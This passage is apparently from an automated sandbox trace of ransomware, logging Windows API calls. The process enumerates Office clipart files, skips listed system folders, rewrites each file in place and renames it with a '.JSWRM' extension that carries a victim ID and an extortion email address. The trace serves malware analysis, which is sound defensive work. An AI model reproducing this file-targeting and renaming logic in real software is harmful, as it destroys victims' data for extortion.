lpNumberOfBytesRead=0x345e89c*=0xbb0, lpOverlapped=0x0) returned 1 [0087.198] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.198] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xbb0, lpOverlapped=0x0) returned 1 [0087.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.198] CloseHandle (hObject=0x314) returned 1 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0087.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0087.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0087.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0087.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195788.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195788.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0087.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.199] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196060.WMF", cAlternateFileName="")) returned 1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2=".") returned 1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2="..") returned 1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2="...") returned 1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2="windows") returned -1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2="recovery") returned -1 [0087.199] lstrcmpiW (lpString1="J0196060.WMF", lpString2="perflogs") returned -1 [0087.200] lstrcmpiW (lpString1="J0196060.WMF", lpString2="documents and settings") returned 1 [0087.200] lstrcmpiW (lpString1="J0196060.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.200] lstrcmpiW (lpString1="J0196060.WMF", lpString2="system volume information") returned -1 [0087.200] lstrcmpiW (lpString1="J0196060.WMF", lpString2="msocache") returned -1 [0087.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196060.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196060.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196060.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196060.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196060.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196060.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.200] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4750) returned 1 [0087.200] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1280) returned 0x205850 [0087.201] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1280, lpOverlapped=0x0) returned 1 [0087.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.203] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1280, lpOverlapped=0x0) returned 1 [0087.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.203] CloseHandle (hObject=0x314) returned 1 [0087.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0087.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0087.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0087.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0087.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196060.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196060.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.205] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196110.WMF", cAlternateFileName="")) returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2=".") returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="..") returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="...") returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="windows") returned -1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="recovery") returned -1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="perflogs") returned -1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="documents and settings") returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="system volume information") returned -1 [0087.205] lstrcmpiW (lpString1="J0196110.WMF", lpString2="msocache") returned -1 [0087.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196110.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196110.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196110.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196110.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196110.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196110.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.206] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5326) returned 1 [0087.206] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14c0) returned 0x205850 [0087.206] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0087.208] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.208] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0087.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.208] CloseHandle (hObject=0x314) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0087.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0087.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0087.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0087.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.209] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196110.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196110.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.210] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebae9de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebae9de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebae9de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xef2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0196142.WMF", cAlternateFileName="")) returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2=".") returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="..") returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="...") returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="windows") returned -1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="recovery") returned -1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="perflogs") returned -1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="documents and settings") returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="system volume information") returned -1 [0087.210] lstrcmpiW (lpString1="J0196142.WMF", lpString2="msocache") returned -1 [0087.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196142.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196142.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196142.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0087.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196142.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0196142.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0196142.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0087.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196142.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3826) returned 1 [0087.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xef0) returned 0x23fc98 [0087.213] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xef0, lpOverlapped=0x0) returned 1 [0087.215] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.215] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xef0, lpOverlapped=0x0) returned 1 [0087.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0087.215] CloseHandle (hObject=0x314) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0087.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0087.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0087.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0087.216] HeapFree (in: 